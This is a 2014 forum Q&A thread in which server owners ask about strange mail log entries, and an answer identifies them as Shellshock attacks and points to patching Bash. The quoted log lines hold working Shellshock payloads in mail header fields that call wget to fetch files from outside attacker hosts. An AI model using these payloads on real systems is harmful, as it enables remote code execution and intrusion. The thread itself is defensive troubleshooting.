alan92110
By:
alan92110

Odd mail hack attempt - can mail pull a wget?

October 21, 2014 1.6k views

My mail log for "nobody@[mydomain.com]" shows this for every field - "To:", "Date:" - all fields. It is from a Chinese IP address. The IP address in the wget is a DigitalOcean address, and the second IP is my server. It appears to be a dead link at this point.

Subject:() { :; };wget http://104.131.141.12:443/vul/[my-ip-address]

Any ideas? I'm lost on the ' { :; }; ' - is there a mail function that will execute the wget?

1 comment
  • I have the same question. I get bounce backs for undeliverable email when it hits my mail server and one of the emails looked like this. What vulnerability is this person trying to exploit?

    From () { :; }; wget voude.marisa.com.br/dc.txt -O /tmp/dcback
    Subject:() { :; }; wget voude.marisa.com.br/dc.txt -O /tmp/dcback
    To () { :; }; wget voude.marisa.com.br/dc.txt -O /tmp/dcback
    CC () { :; }; wget voude.marisa.com.br/dc.txt -O /tmp/dcback

1 Answer

That looks like someone trying to exploit the Shellshock vulnerability on your droplet. Your droplet might be vulnerable if it's running an older version of Bash. Take a look at How to Protect your Server Against the Shellshock Bash Vulnerability | DigitalOcean and make sure that your server is up to date, then you should have nothing to worry about :)

Can you please send an email to abuse@digitalocean.com with a bit more details and a snippet of your mail log (excluding unrelated emails)? Thanks!

On September 24, 2014, a GNU Bash vulnerability, referred to as Shellshock or the "Bash Bug", was disclosed. In short, the vulnerability allows remote attackers to execute arbitrary code given certain conditions, by passing strings of code following environment variable...
Have another answer? Share your knowledge.